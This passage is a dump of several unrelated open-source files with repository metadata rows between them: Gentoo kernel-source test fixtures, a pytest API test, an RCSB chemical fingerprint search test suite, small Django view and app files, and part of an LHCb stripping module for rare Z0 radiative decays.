# Older revisioned sources requested by bare name (note the -r1 suffix
# reflected in every derived name and the 001 revision in kernel_index).
SOURCES['correct'].append(
        {
            'name': 'gentoo-sources-3.9.11-r1',
            'directory_name': 'linux-3.9.11-gentoo-r1',
            'package_name': '=sys-kernel/gentoo-sources-3.9.11-r1',
            'binary_name': 'bzImage-3.9.11-gentoo-r1',
            'configuration_name': 'config-3.9.11-gentoo-r1',
            'system_map_name': 'System.map-3.9.11-gentoo-r1',
            'kernel_index': 3009011001,
            'kernel_suffix': '-3.9.11-gentoo-r1',
            'portage_configuration': { 'MAKEOPTS': '-j5' },
            'source_directories': [
                'linux-3.12.6-gentoo',
                'linux-3.12.5-gentoo',
                'linux-3.10.7-gentoo',
                'linux-3.9.11-gentoo-r1',
            ],
            'configuration_files': [
                'config-3.12.6-gentoo',
                'config-3.12.5-gentoo',
                'config-3.10.7-gentoo',
                'config-3.9.11-gentoo-r1',
            ],
            'package_names': [
                'sys-kernel/gentoo-sources-3.12.6',
                'sys-kernel/gentoo-sources-3.12.5',
                'sys-kernel/gentoo-sources-3.10.7',
                'sys-kernel/gentoo-sources-3.9.11-r1',
            ],
        })

# A non-gentoo flavour (hardened-sources) mixed in among gentoo-sources.
SOURCES['correct'].append(
        {
            'name': 'hardened-sources-3.11.7-r1',
            'directory_name': 'linux-3.11.7-hardened-r1',
            'package_name': '=sys-kernel/hardened-sources-3.11.7-r1',
            'binary_name': 'bzImage-3.11.7-hardened-r1',
            'configuration_name': 'config-3.11.7-hardened-r1',
            'system_map_name': 'System.map-3.11.7-hardened-r1',
            'kernel_index': 3011007001,
            'kernel_suffix': '-3.11.7-hardened-r1',
            'portage_configuration': { 'MAKEOPTS': '-j5' },
            'source_directories': [
                'linux-3.12.6-gentoo',
                'linux-3.12.5-gentoo',
                'linux-3.11.7-hardened-r1',
                'linux-3.10.7-gentoo',
            ],
            'configuration_files': [
                'config-3.12.6-gentoo',
                'config-3.12.5-gentoo',
                'config-3.11.7-hardened-r1',
                'config-3.10.7-gentoo',
            ],
            'package_names': [
                'sys-kernel/gentoo-sources-3.12.6',
                'sys-kernel/gentoo-sources-3.12.5',
                'sys-kernel/hardened-sources-3.11.7-r1',
                'sys-kernel/gentoo-sources-3.10.7',
            ],
        })

# 'all' aggregates every fixture defined above.
SOURCES['all'] = []
SOURCES['all'].extend(SOURCES['correct'])
| [
"alunduil@alunduil.com"
] | alunduil@alunduil.com |
3c55cf6714a04191758570aa165a7e286c861126 | 810ce1c1ac47743e253171ec7541c0e431d952c2 | /cosmic_py/tests/e2e/test_api.py | fc3d0125e3dc13ef34cb093cbd65112a7627ab15 | [] | no_license | hjlarry/practise-py | 91052c25dc7ab706c6234f6d657db76667a27124 | 871e06b9652d356f55e3888f1f7ea180ac2b1954 | refs/heads/master | 2022-09-11T17:47:48.557194 | 2022-08-10T02:07:24 | 2022-08-10T02:07:24 | 136,263,989 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,354 | py | import pytest
import requests
import config
from . import api_client
from ..random_refs import random_sku, random_batchref, random_orderid
@pytest.mark.usefixtures("postgres_db")
@pytest.mark.usefixtures("restart_api")
def test_happy_path_returns_201_and_allocated_batch():
    """End-to-end: allocating against the running API picks the batch
    with the earliest ETA.

    NOTE(review): the allocate endpoint is asserted to answer 202 below;
    the "201" in the test name looks stale -- confirm and rename.
    """
    orderid = random_orderid()
    sku, othersku = random_sku(), random_sku("other")
    earlybatch = random_batchref(1)
    laterbatch = random_batchref(2)
    otherbatch = random_batchref(3)
    # Two batches for the same sku (earliest ETA should win) plus an
    # unrelated sku that must not be touched.
    api_client.post_to_add_batch(laterbatch, sku, 100, "2011-01-02")
    api_client.post_to_add_batch(earlybatch, sku, 100, "2011-01-01")
    api_client.post_to_add_batch(otherbatch, othersku, 100, None)
    r = api_client.post_to_allocate(orderid, sku, qty=3)
    assert r.status_code == 202
    r = api_client.get_allocation(orderid)
    assert r.ok
    assert r.json() == [
        {"sku": sku, "batchref": earlybatch},
    ]
@pytest.mark.usefixtures("postgres_db")
@pytest.mark.usefixtures("restart_api")
def test_unhappy_path_returns_400_and_error_message():
    """End-to-end: allocating an unknown sku yields 400 with an error
    message, and the order then has no allocation (404)."""
    unknown_sku, orderid = random_sku(), random_orderid()
    r = api_client.post_to_allocate(orderid, unknown_sku, qty=20, expect_success=False)
    assert r.status_code == 400
    assert r.json()["message"] == f"Invalid sku {unknown_sku}"
    r = api_client.get_allocation(orderid)
    assert r.status_code == 404
"hjlarry@163.com"
] | hjlarry@163.com |
7865b6100d53f377cfe311ef52f4b4f3c2c25d79 | 53639eec5ac26184132bf16ce8c5bc428ae884a4 | /rcsb/utils/tests-chem/testOeSearchIndexFpScores.py | 13983f50cb160535b84ea4287576726d1fee83e0 | [
"Apache-2.0"
] | permissive | rcsb/py-rcsb_utils_chem | df4bcd5d40a9c61d9440e5f72f3077c7192bfa7d | 3d1a1ffc63cbcfcd43e69a58fd7eada17780e636 | refs/heads/master | 2023-06-12T07:07:55.151599 | 2023-05-22T13:35:27 | 2023-05-22T13:35:27 | 212,129,928 | 0 | 3 | Apache-2.0 | 2023-05-22T13:35:28 | 2019-10-01T15:20:58 | Python | UTF-8 | Python | false | false | 16,081 | py | ##
# File: OeSearchIndexUtilsTests.py
# Author: J. Westbrook
# Date: 1-Oct-2019
# Version: 0.001
#
# Update:
#
#
##
"""
Tests for search modes using source molecular definitions coming from a search index.
"""
__docformat__ = "restructuredtext en"
__author__ = "John Westbrook"
__email__ = "jwest@rcsb.rutgers.edu"
__license__ = "Apache 2.0"
import logging
import os
import platform
import resource
import time
import unittest
from rcsb.utils.chem import __version__
from rcsb.utils.chem.ChemCompIndexProvider import ChemCompIndexProvider
from rcsb.utils.chem.FailList import FailList
from rcsb.utils.chem.OeDepictAlign import OeDepictMCSAlignPage
from rcsb.utils.chem.OeIoUtils import OeIoUtils
from rcsb.utils.chem.OeSearchMoleculeProvider import OeSearchMoleculeProvider
from rcsb.utils.chem.OeSearchUtils import OeSearchUtils
HERE = os.path.abspath(os.path.dirname(__file__))
TOPDIR = os.path.dirname(os.path.dirname(os.path.dirname(HERE)))
logging.basicConfig(level=logging.INFO, format="%(asctime)s [%(levelname)s]-%(module)s.%(funcName)s: %(message)s")
logger = logging.getLogger()
logger.setLevel(logging.INFO)
class OeSearchIndexUtilsTests(unittest.TestCase):
    """Search-mode tests (fingerprint scoring and fingerprint-prefiltered
    substructure search) using molecular definitions from a search index.

    Fixes relative to the original:
      * both private search drivers now honor the ``maxFpResults`` kwarg that
        every caller actually passes (previously they read ``maxResults`` and
        silently fell back to the default of 50);
      * the first ``testCache()`` result in ``__getSearchDataProviders`` is now
        asserted instead of being computed and discarded.
    """

    # Long-running troubleshooting tests are skipped by default.
    skipFlag = True

    def setUp(self):
        """Configure cache paths, fingerprint cutoffs, build types, and the failed-ID list."""
        self.__workPath = os.path.join(HERE, "test-output")
        self.__dataPath = os.path.join(HERE, "test-data")
        self.__cachePath = os.path.join(HERE, "test-output")
        self.__ccUrlTarget = os.path.join(self.__dataPath, "components-abbrev.cif")
        self.__birdUrlTarget = os.path.join(self.__dataPath, "prdcc-abbrev.cif")
        # self.__fpTypeList = ["TREE", "PATH", "MACCS", "CIRCULAR", "LINGO"]
        # (fingerprint type, minimum similarity score) pairs used by all searches
        self.__fpTypeCuttoffList = [("TREE", 0.6), ("PATH", 0.6), ("MACCS", 0.9), ("CIRCULAR", 0.6), ("LINGO", 0.9)]
        self.__screenType = "SMARTS"
        self.__numProc = 1
        self.__minCount = 500
        self.__startTime = time.time()
        #
        # self.__buildTypeList = ["oe-iso-smiles", "oe-smiles", "acdlabs-smiles", "cactvs-iso-smiles", "cactvs-smiles", "inchi"]
        self.__buildTypeList = ["oe-iso-smiles", "oe-smiles", "cactvs-iso-smiles", "cactvs-smiles", "inchi"]
        self.__numMols = 3000
        self.__myKwargs = {
            "cachePath": self.__cachePath,
            "useCache": True,
            "ccFileNamePrefix": "cc-abbrev",
            "oeFileNamePrefix": "oe-abbrev",
            "limitPerceptions": False,
            "minCount": 500,
            "maxFpResults": 50,
            "fpTypeCuttoffList": self.__fpTypeCuttoffList,
            "buildTypeList": self.__buildTypeList,
        }
        #
        fL = FailList()
        self.__failedIdList = sorted(set(fL.getFailedList()))
        logger.info("Using failed count %d", len(self.__failedIdList))
        logger.debug("Running tests on version %s", __version__)
        logger.info("Starting %s at %s", self.id(), time.strftime("%Y %m %d %H:%M:%S", time.localtime()))

    def tearDown(self):
        """Log peak memory use and elapsed wall time for the test."""
        # ru_maxrss is reported in bytes on macOS and kilobytes on Linux,
        # hence the unit switch on platform.
        unitS = "MB" if platform.system() == "Darwin" else "GB"
        rusageMax = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
        logger.info("Maximum resident memory size %.4f %s", rusageMax / 10 ** 6, unitS)
        endTime = time.time()
        logger.info("Completed %s at %s (%.4f seconds)", self.id(), time.strftime("%Y %m %d %H:%M:%S", time.localtime()), endTime - self.__startTime)

    def __resultContains(self, ccId, matchResultList):
        """Return True if any match result in matchResultList carries ccId in its ccId field."""
        for matchResult in matchResultList:
            if ccId in matchResult.ccId:
                return True
        return False

    def __getSearchDataProviders(self, **kwargs):
        """Build and return (OeSearchMoleculeProvider, chem comp index dict) from kwargs."""
        minCount = kwargs.get("minCount", 500)
        oesmP = OeSearchMoleculeProvider(**kwargs)
        ok = oesmP.testCache()
        # Previously this result was computed and discarded; check it explicitly.
        self.assertTrue(ok)
        ccIdxP = ChemCompIndexProvider(**kwargs)
        ok = ccIdxP.testCache(minCount=minCount)
        self.assertTrue(ok)
        ccIdxD = ccIdxP.getIndex()
        return oesmP, ccIdxD

    @unittest.skipIf(skipFlag, "Long troubleshooting test")
    def testFingerPrintScoresFull(self):
        """Fingerprint scores. (full)"""
        numMols = 5000
        myKwargs = {
            "cachePath": self.__cachePath,
            "useCache": True,
            "ccFileNamePrefix": "cc-full",
            "oeFileNamePrefix": "oe-full",
            "limitPerceptions": True,
            "minCount": 500,
            "maxFpResults": 50,
            "fpTypeCuttoffList": self.__fpTypeCuttoffList,
            "buildTypeList": self.__buildTypeList,
            "failedIdList": self.__failedIdList,
        }
        return self.__fingerPrintScores(numMols, **myKwargs)

    def __fingerPrintScores(self, numMols, **kwargs):
        """Score fingerprints for up to numMols previously-failed components and
        report components whose own ID is not recovered (self-hit misses)."""
        # Honor the documented "maxFpResults" key; fall back to the legacy
        # "maxResults" spelling for backward compatibility.
        maxFpResults = kwargs.get("maxFpResults", kwargs.get("maxResults", 50))
        limitPerceptions = kwargs.get("limitPerceptions", True)
        fpTypeCuttoffList = kwargs.get("fpTypeCuttoffList", [("TREE", 0.6)])
        buildTypeList = kwargs.get("buildTypeList", ["oe-iso-smiles"])
        doDisplay = kwargs.get("doDisplay", False)
        failedIdList = kwargs.get("failedIdList", [])
        #
        oesmP, ccIdxD = self.__getSearchDataProviders(**kwargs)
        oesU = OeSearchUtils(oesmP, fpTypeList=[tup[0] for tup in fpTypeCuttoffList])
        oeioU = OeIoUtils()
        # This will reload the oe binary cache.
        oeMol = oesmP.getMol("004")
        self.assertGreaterEqual(len(list(oeMol.GetAtoms())), 12)
        #
        missedFpD = {}
        missedBuildD = {}
        numMols = min(len(ccIdxD), numMols) if numMols else len(ccIdxD)
        logger.info("Begin finger print score search on %d molecules", numMols)
        # ----
        startTime = time.time()
        # for ccId, ccD in list(ccIdxD.items())[:numMols]:
        for ii, ccId in enumerate(failedIdList[:numMols]):
            ccD = ccIdxD[ccId]
            for buildType in buildTypeList:
                if buildType in ccD:
                    oeMol = oeioU.descriptorToMol(ccD[buildType], buildType, limitPerceptions=limitPerceptions, messageTag=ccId + ":" + buildType)
                    if not oeMol:
                        logger.debug("%s build failed for %s - skipping", ccId, buildType)
                        continue
                    maxHits = 0
                    minHits = maxFpResults
                    selfHit = False
                    #
                    startTime1 = time.time()
                    for fpType, minFpScore in fpTypeCuttoffList:
                        retStatus, mL = oesU.getFingerPrintScores(oeMol, fpType, minFpScore, maxFpResults)
                        self.assertTrue(retStatus)
                        logger.debug("%s fpType %r hits %d", ccId, fpType, len(mL))
                        maxHits = max(maxHits, len(mL))
                        minHits = min(minHits, len(mL))
                        matchedSelf = self.__resultContains(ccId, mL)
                        selfHit = selfHit or matchedSelf
                        if not matchedSelf:
                            missedFpD.setdefault(ccId, []).append((buildType, fpType, len(mL)))
                    #
                    if not selfHit:
                        missedBuildD.setdefault(ccId, []).append(buildType)
                    #
                    if maxHits < 1 or not selfHit:
                        logger.info("%s MISSED for buildType %r min hits %d max hits %d (%.4f seconds)", ccId, buildType, minHits, maxHits, time.time() - startTime1)
                    else:
                        logger.debug("%s MATCHED for buildType %r min hits %d max hits %d (%.4f seconds)", ccId, buildType, minHits, maxHits, time.time() - startTime1)
                else:
                    logger.debug("%s missing descriptor %r", ccId, buildType)
            if ii % 100 == 0:
                logger.info("Completed %d of %d missed count %d in (%.4f seconds)", ii, len(failedIdList), len(missedBuildD), time.time() - startTime)
        # ------
        for ccId, bTL in missedBuildD.items():
            logger.info("%s missed all fptypes: buildtype list %r", ccId, bTL)
            if ccId in missedFpD:
                logger.info("%s unmatched by fpTypes %r", ccId, missedFpD[ccId])
        #
        if doDisplay:
            for ccId, bTL in missedBuildD.items():
                idxD = ccIdxD[ccId]
                if "oe-iso-smiles" in idxD:
                    for bT in bTL:
                        self.__displayAlignedDescriptorPair(ccId, idxD["oe-iso-smiles"], "oe-iso-smiles", idxD[bT], bT, title=None, limitPerceptions=True)
        logger.info("%s fingerprints search on %d in (%.4f seconds)", len(fpTypeCuttoffList), numMols, time.time() - startTime)

    # ---- ccId, descrRef, buildTypeRef, descrFit, buildTypeFit, title=None, limitPerceptions=True):
    @unittest.skipIf(skipFlag, "Long troubleshooting test")
    def testSubStructureSearchWithFpFull(self):
        """Substructure search with fingerprint prefilter. (full)"""
        numMols = 5000
        myKwargs = {
            "cachePath": self.__cachePath,
            "useCache": True,
            "ccFileNamePrefix": "cc-full",
            "oeFileNamePrefix": "oe-full",
            "limitPerceptions": True,
            "minCount": 500,
            "maxFpResults": 50,
            "fpTypeCuttoffList": self.__fpTypeCuttoffList,
            "buildTypeList": self.__buildTypeList,
            "failedIdList": self.__failedIdList,
        }
        return self.__sssWithFingerPrintFromDescriptor(numMols, **myKwargs)

    def __sssWithFingerPrintFromDescriptor(self, numMols, **kwargs):
        """Run fingerprint-prefiltered substructure search on up to numMols
        previously-failed components and report self-hit misses."""
        # Honor the documented "maxFpResults" key; fall back to the legacy
        # "maxResults" spelling for backward compatibility.
        maxFpResults = kwargs.get("maxFpResults", kwargs.get("maxResults", 50))
        limitPerceptions = kwargs.get("limitPerceptions", False)
        fpTypeCuttoffList = kwargs.get("fpTypeCuttoffList", [("TREE", 0.6)])
        buildTypeList = kwargs.get("buildTypeList", ["oe-iso-smiles"])
        doDisplay = kwargs.get("doDisplay", False)
        failedIdList = kwargs.get("failedIdList", [])
        #
        oesmP, ccIdxD = self.__getSearchDataProviders(**kwargs)
        oesU = OeSearchUtils(oesmP, fpTypeList=[tup[0] for tup in fpTypeCuttoffList])
        oeioU = OeIoUtils()
        # This will reload the oe binary cache.
        oeMol = oesmP.getMol("004")
        self.assertGreaterEqual(len(list(oeMol.GetAtoms())), 12)
        matchOpts = "graph-relaxed"
        # NOTE(review): missTupL is never populated below, so the doDisplay
        # branch at the end can never render anything - confirm intent.
        missTupL = []
        missedD = {}
        missedFpD = {}
        numMols = min(len(ccIdxD), numMols) if numMols else len(ccIdxD)
        logger.info("Begin substructure search w/ finger print filter on %d molecules", numMols)
        # ----
        startTime = time.time()
        # for ccId, ccD in list(ccIdxD.items())[:numMols]:
        for ii, ccId in enumerate(failedIdList[:numMols]):
            ccD = ccIdxD[ccId]
            for buildType in buildTypeList:
                if buildType in ccD:
                    startTime1 = time.time()
                    oeMol = oeioU.descriptorToMol(ccD[buildType], buildType, limitPerceptions=limitPerceptions, messageTag=ccId + ":" + buildType)
                    if not oeMol:
                        logger.debug("%s build failed for %s - skipping", ccId, buildType)
                        continue
                    maxHits = 0
                    minHits = maxFpResults
                    selfHit = False
                    for fpType, minFpScore in fpTypeCuttoffList:
                        retStatus, mL = oesU.searchSubStructureWithFingerPrint(oeMol, fpType, minFpScore, maxFpResults, matchOpts=matchOpts)
                        self.assertTrue(retStatus)
                        logger.debug("%s fpType %r hits %d", ccId, fpType, len(mL))
                        maxHits = max(maxHits, len(mL))
                        minHits = min(minHits, len(mL))
                        matchedSelf = self.__resultContains(ccId, mL)
                        selfHit = selfHit or matchedSelf
                        if not matchedSelf:
                            missedFpD.setdefault(ccId, []).append((buildType, fpType, len(mL)))
                    if not selfHit:
                        missedD.setdefault(ccId, []).append(buildType)
                    if maxHits < 1 or not selfHit:
                        logger.info("%s (%r) MISSED buildType %r min hits %d max hits %d (%.4f seconds)", ccId, selfHit, buildType, minHits, maxHits, time.time() - startTime1)
                    else:
                        logger.debug("%s (%r) MATCHED buildType %r min hits %d max hits %d (%.4f seconds)", ccId, selfHit, buildType, minHits, maxHits, time.time() - startTime1)
                else:
                    logger.debug("%s missing descriptor %r", ccId, buildType)
            if ii % 100 == 0:
                logger.info("Completed %d of %d missed count %d", ii, len(failedIdList), len(missedD))
        #
        for ccId, missL in missedD.items():
            logger.info("%s missed list %r", ccId, missL)
            if ccId in missedFpD:
                logger.info("%s unmatched for fpTypes %r", ccId, missedFpD[ccId])
        # ----
        if doDisplay:
            mD = {}
            for missTup in missTupL:
                mD.setdefault(missTup[0], []).append(missTup[1])
            for ccId, buildTypeL in mD.items():
                idxD = ccIdxD[ccId]
                if "oe-iso-smiles" in idxD:
                    for buildType in buildTypeL:
                        self.__displayAlignedDescriptorPair(ccId, idxD["oe-iso-smiles"], "oe-iso-smiles", idxD[buildType], buildType, title=None, limitPerceptions=True)
        logger.info("%s fingerprints search on %d in (%.4f seconds)", len(fpTypeCuttoffList), numMols, time.time() - startTime)

    # ---- ccId, descrRef, buildTypeRef, descrFit, buildTypeFit, title=None, limitPerceptions=True):
    def __displayAlignedDescriptorPair(self, ccId, descrRef, buildTypeRef, descrFit, buildTypeFit, title=None, limitPerceptions=True):
        """Render an MCS-aligned SVG depiction of a reference/fit descriptor pair for ccId."""
        oeioU = OeIoUtils()
        oeMolRef = oeioU.descriptorToMol(descrRef, buildTypeRef, limitPerceptions=limitPerceptions, messageTag=ccId + ":" + buildTypeRef)
        oeMolFit = oeioU.descriptorToMol(descrFit, buildTypeFit, limitPerceptions=limitPerceptions, messageTag=ccId + ":" + buildTypeFit)
        #
        oed = OeDepictMCSAlignPage()
        oed.setSearchType(sType="relaxed", minAtomMatchFraction=0.50)
        oed.setDisplayOptions(
            labelAtomName=True, labelAtomCIPStereo=True, labelAtomIndex=False, labelBondIndex=False, highlightStyleFit="ballAndStickInverse", bondDisplayWidth=0.5
        )
        oed.setRefMol(oeMolRef, ccId)
        oed.setFitMol(oeMolFit, ccId)
        myTitle = title if title else buildTypeRef + "-" + buildTypeFit
        imgPath = os.path.join(self.__workPath, myTitle + "-" + ccId + ".svg")
        logger.info("Using image path %r", imgPath)
        aML = oed.alignPair(imagePath=imgPath)
        if aML:
            logger.info("%s aligned image path %r", ccId, imgPath)
            for (rCC, rAt, tCC, tAt) in aML:
                logger.debug("%5s %-5s %5s %-5s", rCC, rAt, tCC, tAt)
def subStructureSearch():
    """Assemble the abbreviated-dataset substructure search suite."""
    # NOTE(review): these case names are not defined in the visible
    # OeSearchIndexUtilsTests class - confirm before running this suite.
    suite = unittest.TestSuite()
    for caseName in (
        "testSubStructureSearchExhaustiveAbbrev",
        "testSubStructureSearchWithFpAbbrev",
        "testSubStructureSearchScreenedAbbrev",
        "testSubStructureSearchScreenedFiltered",
    ):
        suite.addTest(OeSearchIndexUtilsTests(caseName))
    return suite
def fingerprintSearch():
    """Assemble the abbreviated-dataset fingerprint search suite."""
    # NOTE(review): these case names are not defined in the visible
    # OeSearchIndexUtilsTests class - confirm before running this suite.
    suite = unittest.TestSuite()
    for caseName in (
        "testFingerPrintSearchAbbrev",
        "testFingerPrintScoresAbbrev",
    ):
        suite.addTest(OeSearchIndexUtilsTests(caseName))
    return suite
def fullSearchTests():
    """Assemble the full-dataset (troubleshooting) search suite."""
    suite = unittest.TestSuite()
    for caseName in (
        "testSubStructureSearchWithFpFull",
        "testFingerPrintScoresFull",
    ):
        suite.addTest(OeSearchIndexUtilsTests(caseName))
    return suite
if __name__ == "__main__":
    # Script entry point: run only the full-dataset search suite.
    mySuite = fullSearchTests()
    unittest.TextTestRunner(verbosity=2).run(mySuite)
| [
"john.westbrook@rcsb.org"
] | john.westbrook@rcsb.org |
883a6c20e7944bbab06ab0137f5b161f3a652d38 | 9f5bc6d70835e32a02364766b406d0cc08e45692 | /hello_dj/music/views.py | 986db014c229efe440662c4a77e9f5c3b977a2c1 | [] | no_license | zx490336534/learn_django | f206f13901a4c177bc78629b839da0b947764927 | 78274ccdb5d97b0576fa893a119dc60369300be2 | refs/heads/master | 2020-04-03T16:39:07.325023 | 2018-11-23T13:59:38 | 2018-11-23T13:59:38 | 155,413,348 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 359 | py | from django.shortcuts import render
# Create your views here.
def index(request):
    """Render the music index page with a small demo template context."""
    context = {
        'str': 'LIST',
        'format_string': '%Y年%m月%d日 %H:%M:%S',
        'ls': [1, 2, 3],
        'tp': ('taka', 'xiaopo', 'moran'),
    }
    return render(request, 'music/music_index.html', context=context)
| [
"490336534@qq.com"
] | 490336534@qq.com |
0582897f7a69500d2f5c4c8fa2494d17fb05329e | 9c9ea9c714eeac36a931f70d2ea7827f6390cf6e | /Pamas/pamas/apps.py | 3b3566431adf51a8b45d63f95bae648c9083ac55 | [
"MIT"
] | permissive | Kipngetich33/Patient-Management-System | fda4572dc7970b96c31da22d301851f90292f58e | 85ca9f3ba403c40ae950e7a59bdff460b5aa0a4b | refs/heads/master | 2021-04-15T09:33:21.874628 | 2018-03-27T16:18:38 | 2018-03-27T16:18:38 | 126,166,290 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 85 | py | from django.apps import AppConfig
class PamasConfig(AppConfig):
    """Django application configuration for the ``pamas`` app."""
    name = 'pamas'
| [
"khalifngeno@gmail.com"
] | khalifngeno@gmail.com |
1647fc226c8cbc176c5b932a76f084e49407d819 | be0f3dfbaa2fa3d8bbe59229aef3212d032e7dd1 | /DaVinci_v41r2/Phys/StrippingSelections/python/StrippingSelections/StrippingQEE/StrippingZ0RareDecay.py | 2c6998592537863818d578d9100d7ff0f1296b49 | [] | no_license | Sally27/backup_cmtuser_full | 34782102ed23c6335c48650a6eaa901137355d00 | 8924bebb935b96d438ce85b384cfc132d9af90f6 | refs/heads/master | 2020-05-21T09:27:04.370765 | 2018-12-12T14:41:07 | 2018-12-12T14:41:07 | 185,989,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26,281 | py | """
Modified from StrippingRD/StrippingBeauty2XGammaExclusive.py
Module for construction of Z boson Radiative Decays Stripping Selections and StrippingLines.
Provides functions to build K*, rho, omega, D0, Jpsi, and Upsilon selections.
"""
__author__ = ['Hang Yin']
__date__ = '04/03/2016'
__version__ = '$Revision: 1.0 $'
__all__ = 'default_config', 'Z0RareDecayConf'
from Gaudi.Configuration import *
from GaudiKernel.SystemOfUnits import MeV, GeV, mm
from GaudiConfUtils.ConfigurableGenerators import FilterDesktop, CombineParticles
from PhysSelPython.Wrappers import Selection, DataOnDemand, MergedSelection
from StrippingConf.StrippingLine import StrippingLine
from StrippingUtils.Utils import LineBuilder
from StandardParticles import StdLooseAllPhotons
# Stripping line-builder registration dictionary.  All mass/momentum values
# carry GaudiKernel.SystemOfUnits (MeV) units.
default_config = {
    'NAME' : 'Z0RareDecay',
    'BUILDERTYPE' : 'Z0RareDecayConf',
    'WGs' : ['QEE'],
    'STREAMS' : ['EW'],
    'CONFIG' : {
        'TrChi2' : 5., # dimensionless, useless (default is 4)
        'VtxChi2' : 20., # dimensionless, useless (default is 4)
        'RhoMassWin' : 230. * MeV,
        'OmegaMassWin' : 230. * MeV,
        'KstMassWin' : 120. * MeV,
        'PhiMassWin' : 200. * MeV,
        'D0MassWin' : 100. * MeV,
        'JpsiMassMin' : 3000. * MeV,
        'JpsiMassMax' : 3200. * MeV,
        'UpsilonMassMin' : 8500. * MeV,
        # NOTE(review): a negative MuonP threshold makes the muon momentum
        # cut in makeQON always pass - presumably intentional; confirm.
        'MuonP' : -8000. * MeV,
        'MuonPT' : 650. * MeV,
        'photonPT' : 2500. * MeV,
        'pion0PT' : 860. * MeV,
        'Pi0Pi0PT' : 10000. * MeV,
        'MesonPT' : 13000. * MeV,
        'ZMassWin' : 60000. * MeV,
        # Pre- and postscales
        'Z2GammaGammaPreScale' : 1.0,
        'Z2GammaGammaPostScale' : 1.0,
        'Z2Pi0GammaPreScale' : 1.0,
        'Z2Pi0GammaPostScale' : 1.0,
        'Z2Pi0Pi0PreScale' : 1.0,
        'Z2Pi0Pi0PostScale' : 1.0,
        'Z2RhoGammaPreScale' : 1.0,
        'Z2RhoGammaPostScale' : 1.0,
        'Z2OmegaGammaPreScale' : 1.0,
        'Z2OmegaGammaPostScale' : 1.0,
        'Z2KstGammaPreScale' : 1.0,
        'Z2KstGammaPostScale' : 1.0,
        'Z2PhiGammaPreScale' : 1.0,
        'Z2PhiGammaPostScale' : 1.0,
        'Z2D0GammaPreScale' : 1.0,
        'Z2D0GammaPostScale' : 1.0,
        'Z2QONGammaPreScale' : 1.0,
        'Z2QONGammaPostScale' : 1.0,
        #'RawEvents' : ["Muon", "Calo", "Rich", "Velo", "Tracker"],
    },
}
class Z0RareDecayConf(LineBuilder):
    """Line builder for rare radiative Z0 decays.

    Builds daughter selections (photon, pi0, rho, omega, K*, phi, D0 and
    quarkonium) via the module-level maker functions, combines them into
    Z0 -> X gamma selections, and registers one stripping line per mode.
    """
    __configuration_keys__ = default_config['CONFIG'].keys()
    def __init__(self, name, config):
        """Construct all selections and stripping lines.

        @arg name: prefix used for all selection/line names.
        @arg config: dict matching default_config['CONFIG'].
        """
        LineBuilder.__init__(self, name, config)
        ##
        ## Selection of Z daughters: photon, pion0, rho, omega,
        ## kstar, phi, Jpsi and Upsilon
        ##
        # make photon
        selPhoton = makePhoton('PhotonSel' + name,
                               config['photonPT'])
        # higher-PT photon used for the K* gamma combination below
        selPhotonHi = makePhoton('PhotonHighSel' + name,
                                 config['Pi0Pi0PT'])
        # make pion0
        selPion0 = makePion0('Pion0SelMy',
                             config['pion0PT'])
        # make rho
        selRho = makeRho('RhoSel' + name,
                         config['TrChi2'],
                         config['MesonPT'],
                         config['RhoMassWin'])
        # make omega
        selOmega = makeOmega('OmegaSel' + name,
                             config['MesonPT'],
                             config['OmegaMassWin'],
                             selPion0)
        # make Kstar
        selKst = makeKstar('KStarSel' + name,
                           config['TrChi2'],
                           config['MesonPT'],
                           config['KstMassWin'])
        # make phi
        selPhi2KK = makePhi2KK('PhiSel' + name,
                               config['TrChi2'],
                               config['MesonPT'],
                               config['PhiMassWin'])
        # make D0
        selD02KPi = makeD02KPi('D0Sel' + name,
                               config['TrChi2'],
                               config['MesonPT'],
                               config['D0MassWin'])
        # make quarkonium
        selQON = makeQON('QniumSel' + name,
                         config['VtxChi2'],
                         config['TrChi2'],
                         config['MesonPT'],
                         config['MuonPT'],
                         config['MuonP'],
                         config['JpsiMassMin'],
                         config['JpsiMassMax'],
                         config['UpsilonMassMin'])
        ##
        ## make event selections
        ##
        # Z -> Gamma Gamma selections
        selZ2GammaGamma = makeZ2GammaGamma(name + 'Z2GammaGamma',
                                           selPhoton,
                                           config['Pi0Pi0PT'],
                                           config['ZMassWin'])
        # Z -> Pi0 Gamma selections
        selZ2Pi0Gamma = makeZ2Pi0Gamma(name + 'Z2Pi0Gamma',
                                       selPion0,
                                       selPhoton,
                                       config['Pi0Pi0PT'],
                                       config['ZMassWin'])
        # Z -> Pi0 Pi0 selections
        selZ2Pi0Pi0 = makeZ2Pi0Pi0(name + 'Z2Pi0Pi0',
                                   selPion0,
                                   config['Pi0Pi0PT'],
                                   config['ZMassWin'])
        # Z -> rho Gamma selections
        selZ2RhoGamma = makeZ2RhoGamma(name + 'Z2RhoGamma',
                                       selRho,
                                       selPhoton,
                                       config['ZMassWin'])
        # Z -> Omega Gamma selections
        selZ2OmegaGamma = makeZ2OmegaGamma(name + 'Z2OmegaGamma',
                                           selOmega,
                                           selPhoton,
                                           config['ZMassWin'])
        # Z ->Kst Gamma selections
        selZ2KstGamma = makeZ2KstGamma(name + 'Z2KstGamma',
                                       selKst,
                                       selPhotonHi,
                                       config['ZMassWin'])
        # Z ->Phi Gamma selections
        selZ2PhiGamma = makeZ2PhiGamma(name + 'Z2PhiGamma',
                                       selPhi2KK,
                                       selPhoton,
                                       config['ZMassWin'])
        # Z ->D0 Gamma selections
        selZ2D0Gamma = makeZ2D0Gamma(name + 'Z2D0Gamma',
                                     selD02KPi,
                                     selPhoton,
                                     config['ZMassWin'])
        # Z -> Jpsi/Upsilon Gamma selections
        selZ2QONGamma = makeZ2QONGamma(name + 'Z2QONGamma',
                                       selQON,
                                       selPhoton,
                                       config['ZMassWin'])
        ##
        ## Stripping lines
        ##
        # Z-> gamma gamma line
        Z2GammaGammaLine = StrippingLine(name + 'Z2GammaGammaLine',
                                         prescale=config['Z2GammaGammaPreScale'],
                                         postscale=config['Z2GammaGammaPostScale'],
                                         #RequiredRawEvents = config['RawEvents'],
                                         RelatedInfoTools = [{'Type' : 'RelInfoVertexIsolation', 'Location': "VertexIsoInfo" }],
                                         selection=selZ2GammaGamma)
        self.registerLine(Z2GammaGammaLine)
        # Z-> pi0 gamma line
